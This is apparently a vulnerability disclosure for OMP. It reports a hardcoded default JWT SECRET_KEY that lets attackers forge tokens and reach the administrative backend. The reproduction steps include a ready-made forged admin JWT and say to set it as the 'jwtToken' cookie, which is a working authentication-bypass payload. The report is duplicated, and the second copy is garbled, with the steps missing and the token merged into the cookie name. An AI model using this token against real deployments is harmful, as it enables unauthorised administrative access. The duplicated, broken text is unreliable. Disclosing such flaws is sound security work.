This issue is submitted for CVE assignment.
A vulnerability has been identified in OMP due to the use of a hardcoded default SECRET_KEY in its configuration. Specifically, the key is defined in the application settings file and remains unchanged in deployments derived from the public repository.
The application relies on this SECRET_KEY to sign JSON Web Tokens (JWT) for authentication and authorization. Because the key is publicly exposed and static, an attacker can forge valid JWT tokens by using the known secret. By crafting malicious tokens, an attacker can bypass authentication mechanisms and escalate privileges to gain administrative access.
Additionally, the same weak secret enables attackers to manipulate or generate authentication cookies, further allowing unauthorized access to the management interface.
Impact:
Successful exploitation of this vulnerability allows unauthenticated attackers to:
• Bypass authentication controls
• Escalate privileges to administrator level
• Access sensitive system data and management functions
This vulnerability has been assigned the identifier CNVD-2026-06597 and has been officially included in the China National Vulnerability Database (CNVD).
Steps to Reproduce
- Use default SECRET_KEY to generate JWT like
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZW1haWwiOiJhZG1pbkBjbG91ZHdpc2UuY29tIn0.ZA499RlITPrHcrI7OLzUH_DDca5vW3mD7e4CUQrHqRs
- Save the jwt token as cookie
jwtToken
- Refresh the page to successfully bypass authentication and log in to the administrative backend.
This issue is submitted for CVE assignment.
A vulnerability has been identified in OMP due to the use of a hardcoded default SECRET_KEY in its configuration. Specifically, the key is defined in the application settings file and remains unchanged in deployments derived from the public repository.
The application relies on this SECRET_KEY to sign JSON Web Tokens (JWT) for authentication and authorization. Because the key is publicly exposed and static, an attacker can forge valid JWT tokens by using the known secret. By crafting malicious tokens, an attacker can bypass authentication mechanisms and escalate privileges to gain administrative access.
Additionally, the same weak secret enables attackers to manipulate or generate authentication cookies, further allowing unauthorized access to the management interface.
Impact:
Successful exploitation of this vulnerability allows unauthenticated attackers to:
• Bypass authentication controls
• Escalate privileges to administrator level
• Access sensitive system data and management functions
This vulnerability has been assigned the identifier CNVD-2026-06597 and has been officially included in the China National Vulnerability Database (CNVD).
Steps to Reproduce
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZW1haWwiOiJhZG1pbkBjbG91ZHdpc2UuY29tIn0.ZA499RlITPrHcrI7OLzUH_DDca5vW3mD7e4CUQrHqRsjwtToken